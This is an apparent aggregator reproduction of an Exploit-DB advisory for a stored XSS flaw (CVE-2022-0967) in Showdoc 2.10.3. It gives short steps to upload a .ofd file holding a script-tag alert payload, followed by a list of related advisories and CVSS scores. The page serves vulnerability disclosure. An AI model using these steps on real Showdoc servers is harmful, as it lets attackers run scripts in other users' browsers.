Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)

🗓️ 17 May 2022 00:00:00Reported by Akshay RaviType

exploitdb🔗 www.exploit-db.com👁 204 Views

Showdoc 2.10.3 Stored Cross-Site Scripting (XSS) via .ofd file uploa

Reporter	Title	Published	Views	Family All 17
0day.today	Showdoc 2.10.3 - Stored Cross-Site Scripting Vulnerability	17 May 202200:00	–	zdt
Huntr	Stored XSS via File Upload in star7th/showdoc in star7th/showdoc	14 Mar 202214:39	–	huntr
Circl	CVE-2022-0967	15 Mar 202219:19	–	circl
CNNVD	showdoc 跨站脚本漏洞	15 Mar 202200:00	–	cnnvd
CNVD	showdoc .properties file upload vulnerability (CNVD-2022-20508)	17 Mar 202200:00	–	cnvd
CNVD	showdoc .ofd file upload vulnerability	17 Mar 202200:00	–	cnvd
CVE	CVE-2022-0967	15 Mar 202215:35	–	cve
Cvelist	CVE-2022-0967 Stored XSS via File Upload in star7th/showdoc in star7th/showdoc in star7th/showdoc	15 Mar 202215:35	–	cvelist
EUVD	EUVD-2022-1291	3 Oct 202520:07	–	euvd
Github Security Blog	Stored Cross-site Scripting in showdoc	16 Mar 202200:00	–	github

# Exploit Title: Showdoc 2.10.3 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Akshay Ravi
# Vendor Homepage: https://github.com/star7th/showdoc
# Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.3
# Version: <= 2.10.3
# Tested on: macOS Monterey
# CVE : CVE-2022-0967

Description: Stored XSS via uploading file in .ofd format

1. Create a file with .ofd extension and add XSS Payload inside the file
	
	filename = "payload.ofd"
	payload = "<script>alert(1)</script>"

2. Login to showdoc v2.10.2 and go to file library
	
	Endpoint = "https://www.site.com/attachment/index"

3. Upload the payload on file library and click on the check button
4. The XSS payload will executed once we visited the URL

17 May 2022 00:00Current

5.5Medium risk

Vulners AI Score5.5

CVSS 23.5

CVSS 3.15.4

CVSS 36.9

EPSS0.00831